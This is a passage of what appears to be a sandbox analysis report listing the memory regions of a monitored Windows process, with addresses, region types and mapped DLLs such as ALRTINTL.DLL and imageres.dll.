entry_point = 0x0 region_type = private name = "private_0x0000000014670000" filename = "" Region: id = 1442 start_va = 0x14700000 end_va = 0x1470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014700000" filename = "" Region: id = 1443 start_va = 0x189f0000 end_va = 0x18aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000189f0000" filename = "" Region: id = 1444 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1445 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1446 start_va = 0xb1b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1447 start_va = 0xb1b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1448 start_va = 0xb1b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1449 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1450 start_va = 0xb1b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1451 start_va = 0xb1b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 1459 start_va = 0xb1b0000 end_va = 0xb1bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1460 start_va = 0xb1b0000 end_va = 0xb1bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1462 start_va = 0x66f00000 end_va = 0x6701bfff monitored = 0 entry_point = 0x66f674f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 1466 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1b0000" filename = "" Region: id = 1467 start_va = 0xb1c0000 end_va = 0xb1c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1468 start_va = 0xb1d0000 end_va = 0xb1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1d0000" filename = "" Region: id = 1469 start_va = 0xb1e0000 end_va = 0xb1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 1470 start_va = 0xb1f0000 end_va = 0xb1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 1471 start_va = 0xb200000 end_va = 0xb203fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 1472 start_va = 0xb210000 end_va = 0xb211fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1473 start_va = 0xb220000 end_va = 0xb221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 1474 start_va = 0xb230000 end_va = 0xb231fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 1475 start_va = 0xb240000 end_va = 0xb240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b240000" filename = "" Region: id = 1476 start_va = 0xb250000 end_va = 0xb251fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b250000" filename = "" Region: id = 1477 start_va = 0xb260000 end_va = 0xb398fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1478 start_va = 0xb3a0000 end_va = 0xb414fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1479 start_va = 0xb1c0000 end_va = 0xb1c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1480 start_va = 0xb420000 end_va = 0xb423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b420000" filename = "" Region: id = 1481 start_va = 0x11d00000 end_va = 0x121d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d00000" filename = "" Region: id = 1482 start_va = 0xb200000 end_va = 0xb202fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 1483 start_va = 0xb210000 end_va = 0xb213fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1484 start_va = 0xb220000 end_va = 0xb221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 1485 start_va = 0xb230000 end_va = 0xb231fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 1486 start_va = 0xb430000 end_va = 0xb431fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b430000" filename = "" Region: id = 1487 start_va = 0x18af0000 end_va = 0x19abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000018af0000" filename = "" Region: id = 1488 start_va = 0xb200000 end_va = 0xb225fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 1489 start_va = 0xb200000 end_va = 0xb226fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 1490 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1491 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1492 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1493 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1494 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1495 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1496 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1497 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1499 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1500 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1501 start_va = 0xb1c0000 end_va = 0xb1c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1502 start_va = 0xb200000 end_va = 0xb200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 1503 start_va = 0x19ac0000 end_va = 0x1c6ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 1504 start_va = 0xb1c0000 end_va = 0xb1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1505 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1506 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1507 start_va = 0xb200000 end_va = 0xb20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 1508 start_va = 0xb210000 end_va = 0xb210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1509 start_va = 0xb220000 end_va = 0xb220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 1510 start_va = 0xb230000 end_va = 0xb230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 1511 start_va = 0xb260000 end_va = 0xb276fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1512 start_va = 0xb280000 end_va = 0xb280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b280000" filename = "" Region: id = 1513 start_va = 0xb290000 end_va = 0xb292fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b290000" filename = "" Region: id = 1514 start_va = 0xb2a0000 end_va = 0xb2a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2a0000" filename = "" Region: id = 1515 start_va = 0xb2b0000 end_va = 0xb2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 1516 start_va = 0xb2c0000 end_va = 0xb2c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2c0000" filename = "" Region: id = 1517 start_va = 0xb2d0000 end_va = 0xb2d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2d0000" filename = "" Region: id = 1518 start_va = 0xb2e0000 end_va = 0xb2e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2e0000" filename = "" Region: id = 1519 start_va = 0xb2f0000 end_va = 0xb2f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 1520 start_va = 0xb300000 end_va = 0xb300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b300000" filename = "" Region: id = 1521 start_va = 0xb310000 end_va = 0xb310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b310000" filename = "" Region: id = 1522 start_va = 0xb320000 end_va = 0xb386fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b320000" filename = "" Region: id = 1523 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1524 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1525 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1526 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1527 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1528 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1529 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1530 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1531 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1532 start_va = 0xb260000 end_va = 0xb372fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1533 start_va = 0xb260000 end_va = 0xb36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1534 start_va = 0xb370000 end_va = 0xb48bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b370000" filename = "" Region: id = 1535 start_va = 0x66ea0000 end_va = 0x66ef6fff monitored = 0 entry_point = 0x66ed5fc0 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\SysWOW64\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\syswow64\\photometadatahandler.dll") Region: id = 1538 start_va = 0x11d00000 end_va = 0x1201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d00000" filename = "" Region: id = 1539 start_va = 0x12020000 end_va = 0x12372fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012020000" filename = "" Region: id = 1540 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1541 start_va = 0xf620000 end_va = 0xfb2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f620000" filename = "" Region: id = 1542 start_va = 0xfb30000 end_va = 0x10032fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb30000" filename = "" Region: id = 1543 start_va = 0x12a70000 end_va = 0x12f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a70000" filename = "" Region: id = 1544 start_va = 0x1c6e0000 end_va = 0x1cbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c6e0000" filename = "" Region: id = 1545 start_va = 0x1cbf0000 end_va = 0x1d0f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001cbf0000" filename = "" Region: id = 1546 start_va = 0x1d100000 end_va = 0x1d60bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d100000" filename = "" Region: id = 1547 start_va = 0x1d610000 end_va = 0x1db15fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d610000" filename = "" Region: id = 1548 start_va = 0x1db20000 end_va = 0x1e021fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001db20000" filename = "" Region: id = 1549 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1550 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1551 start_va = 0x1e030000 end_va = 0x1e539fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001e030000" filename = "" Region: id = 1552 start_va = 0x1e540000 end_va = 0x1ea44fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001e540000" filename = "" Region: id = 1553 start_va = 0x1ea50000 end_va = 0x1ef5efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ea50000" filename = "" Region: id = 1554 start_va = 0x1ef60000 end_va = 0x1f466fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ef60000" filename = "" Region: id = 1555 start_va = 0x1f470000 end_va = 0x1f975fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001f470000" filename = "" Region: id = 1556 start_va = 0x10040000 end_va = 0x1016efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010040000" filename = "" Region: id = 1557 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1558 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1559 start_va = 0x12380000 end_va = 0x124aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012380000" filename = "" Region: id = 1560 start_va = 0x12f80000 end_va = 0x1317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f80000" filename = "" Region: id = 1561 start_va = 0xb260000 end_va = 0xb35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b260000" filename = "" Region: id = 1562 start_va = 0xb200000 end_va = 0xb200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 1563 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1564 start_va = 0x124b0000 end_va = 0x125e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124b0000" filename = "" Region: id = 1565 start_va = 0x12f80000 end_va = 0x130aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f80000" filename = "" Region: id = 1566 start_va = 0x130b0000 end_va = 0x132affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000130b0000" filename = "" Region: id = 1567 start_va = 0x12f80000 end_va = 0x130bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f80000" filename = "" Region: id = 1568 start_va = 0x12380000 end_va = 0x124affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012380000" filename = "" Region: id = 1569 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1570 start_va = 0x12380000 end_va = 0x124b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012380000" filename = "" Region: id = 1571 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 1572 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1573 start_va = 0xb210000 end_va = 0xb21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 1574 start_va = 0xb220000 end_va = 0xb22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 1575 start_va = 0xb230000 end_va = 0xb23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 1576 start_va = 0xcc60000 end_va = 0xcd04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc60000" filename = "" Region: id = 1577 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 1578 start_va = 0xb360000 end_va = 0xb360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b360000" filename = "" Region: id = 1579 start_va = 0xb360000 end_va = 0xb360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b360000" filename = "" Region: id = 1580 start_va = 0x66b00000 end_va = 0x66e90fff monitored = 0 entry_point = 0x66db35b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 1581 start_va = 0xb360000 end_va = 0xb36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b360000" filename = "" Region: id = 1582 start_va = 0xb490000 end_va = 0xb49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b490000" filename = "" Region: id = 1583 start_va = 0xb4a0000 end_va = 0xb4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4a0000" filename = "" Region: id = 1584 start_va = 0x10040000 end_va = 0x1013ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010040000" filename = "" Region: id = 1585 start_va = 0xb4b0000 end_va = 0xb4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4b0000" filename = "" Region: id = 1586 start_va = 0xb4c0000 end_va = 0xb4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 1587 start_va = 0xb4d0000 end_va = 0xb4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4d0000" filename = "" Region: id = 1588 start_va = 0xb4e0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4e0000" filename = "" Region: id = 1589 start_va = 0xb4f0000 end_va = 0xb4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 1590 start_va = 0xb500000 end_va = 0xb50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 1591 start_va = 0xb510000 end_va = 0xb51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b510000" filename = "" Region: id = 1592 start_va = 0xcd10000 end_va = 0xcd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd10000" filename = "" Region: id = 1593 start_va = 0xcd20000 end_va = 0xcd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd20000" filename = "" Region: id = 1594 start_va = 0xb4b0000 end_va = 0xb4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4b0000" filename = "" Region: id = 1595 start_va = 0xb4c0000 end_va = 0xb4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4c0000" filename = "" Region: id = 1596 start_va = 0xb4d0000 end_va = 0xb4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4d0000" filename = "" Region: id = 1597 start_va = 0xb4e0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4e0000" filename = "" Region: id = 1598 start_va = 0x10140000 end_va = 0x1023ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010140000" filename = "" Region: id = 1599 start_va = 0xb4f0000 end_va = 0xb4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 1600 start_va = 0xb500000 end_va = 0xb50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 1601 start_va = 0xb510000 end_va = 0xb51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b510000" filename = "" Region: id = 1602 start_va = 0xcd10000 end_va = 0xcd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd10000" filename = "" Region: id = 1603 start_va = 0xcd20000 end_va = 0xcd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd20000" filename = "" Region: id = 1604 start_va = 0xcd30000 end_va = 0xcd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd30000" filename = "" Region: id = 1605 start_va = 0xcd40000 end_va = 0xcd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd40000" filename = "" Region: id = 1606 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1607 start_va = 0xcd60000 end_va = 0xcd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 1608 start_va = 0xcd70000 end_va = 0xcd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd70000" filename = "" Region: id = 1609 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1610 start_va = 0xcdd0000 end_va = 0xcddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1611 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 1612 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1613 start_va = 0xcd60000 end_va = 0xcd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 1614 start_va = 0xcd70000 end_va = 0xcd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd70000" filename = "" Region: id = 1615 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1616 start_va = 0xcdd0000 end_va = 0xcddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1617 start_va = 0xcd50000 end_va = 0xcd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1618 start_va = 0xcd60000 end_va = 0xcd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 1619 start_va = 0xcd70000 end_va = 0xcd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd70000" filename = "" Region: id = 1620 start_va = 0xcdc0000 end_va = 0xcdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdc0000" filename = "" Region: id = 1621 start_va = 0xcdd0000 end_va = 0xcddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cdd0000" filename = "" Region: id = 1622 start_va = 0xcf30000 end_va = 0xcf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 1623 start_va = 0xcf40000 end_va = 0xcf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf40000" filename = "" Region: id = 1624 start_va = 0xcf50000 end_va = 0xcf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf50000" filename = "" Region: id = 1625 start_va = 0xcf60000 end_va = 0xcf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf60000" filename = "" Region: id = 1626 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1627 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1628 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1630 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1632 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1657 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1678 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1679 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1684 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1687 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1690 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1693 start_va = 0xcd60000 end_va = 0xcd62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd60000" filename = "" Region: id = 1694 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd50000" filename = "" Region: id = 1695 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 1696 start_va = 0xcd50000 end_va = 0xcd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd50000" filename = "" Region: id = 